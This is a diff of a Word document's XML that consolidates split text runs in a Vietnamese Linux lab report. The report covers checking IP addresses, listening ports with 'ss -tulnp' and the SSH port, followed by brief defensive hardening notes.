-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cụ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tự</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>động</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Rủi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ro</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Mật</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>khẩu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>yếu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dễ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bị</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xâm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhập</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>N</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> là h</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ố</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t thì c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">n </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>x</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ử</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lý</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gì</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thêm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Tự</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>động</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hóa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>phát</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hiện</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>và</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>phản</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hồi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Tự động hóa phát hiện và phản hồi</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5866,247 +1276,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Chuyển</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đổi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>phương</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thức</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xác</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thực</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Vô</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hiệu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hóa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hoàn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>toàn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>việc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đăng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhập</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bằng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mật</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>khẩu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đối</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>với</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>các</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dịch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vụ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mạng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Thay</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đó</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bắt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>buộc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sử</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dụng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">+ Chuyển đổi phương thức xác thực: Vô hiệu hóa hoàn toàn việc đăng nhập bằng mật khẩu đối với các dịch vụ mạng. Thay vào đó, bắt buộc sử dụng </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6120,86 +1290,8 @@
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Bảo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>vệ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>tài</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>khoản</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>đặc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>quyền</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>+ Bảo vệ tài khoản đặc quyền</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6212,46 +1304,16 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c tiêu:</w:t>
+        <w:t>Mục tiêu:</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Ki</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m tra IP và port</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Các bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n:</w:t>
+        <w:t>Kiểm tra IP và port</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Các bước thực hiện:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6259,38 +1321,21 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 1: Ki</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m tra IP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a</w:t>
+        <w:t>Bước 1: Kiểm tra IP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ip a</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="277EFE90" wp14:editId="657CEFCC">
-            <wp:extent cx="5486400" cy="1722120"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="12" name="Picture 12"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A501BE3" wp14:editId="3EF71CD1">
+            <wp:extent cx="5486400" cy="2454910"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="1965372952" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6298,7 +1343,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPr id="1965372952" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6310,7 +1355,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5486400" cy="1722120"/>
+                      <a:ext cx="5486400" cy="2454910"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6322,21 +1367,13 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 2: Ping internet</w:t>
+        <w:t>Bước 2: Ping internet</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6345,50 +1382,12 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 3: Ki</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m tra port</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ss</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>–</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tulnp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
       <w:r>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4183CAB5" wp14:editId="526E8F0B">
-            <wp:extent cx="5486400" cy="1541145"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
-            <wp:docPr id="11" name="Picture 11"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="471D1628" wp14:editId="51A3AC67">
+            <wp:extent cx="5486400" cy="1666875"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1022098636" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6396,7 +1395,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPr id="1022098636" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6408,7 +1407,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5486400" cy="1541145"/>
+                      <a:ext cx="5486400" cy="1666875"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6426,13 +1425,66 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 4: Tìm port SSH</w:t>
+        <w:t>Bước 3: Kiểm tra port</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">ss </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tulnp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C73ECE1" wp14:editId="6EAF27CA">
+            <wp:extent cx="5486400" cy="2351405"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1201267307" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1201267307" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="2351405"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Bước 4: Tìm port SSH</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6442,25 +1494,46 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t qu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> mong đ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ợ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i:</w:t>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75A74D83" wp14:editId="63761A5E">
+            <wp:extent cx="5486400" cy="567055"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="1097828566" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1097828566" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="567055"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Kết quả mong đợi:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6468,13 +1541,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y IP máy</w:t>
+        <w:t>Thấy IP máy</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6482,13 +1549,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u listening port</w:t>
+        <w:t>Hiểu listening port</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6496,144 +1557,111 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Bi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t SSH port</w:t>
+        <w:t>Biết SSH port</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Phân tích sau LAB:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Command nào quan trọng nhất?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Lệnh quan trọng nhất là ss -tulnp, giúp thấy những cổng mở, giao thức đang sử dụng và tiến trình đang chạy sau port đó</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>- Output nào cần chú ý?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Kết quả lệnh ss -tulnp:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Cột Local Address:Port</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Trạng thái</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ Cột process: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>xác định chính xác ứng dụng nào đang chiếm giữ port</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Netid: giao thức kết nối</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>- Có rủi ro bảo mật nào?</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Phân tích sau LAB:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>- Command nào quan tr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ọ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng nh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t?</w:t>
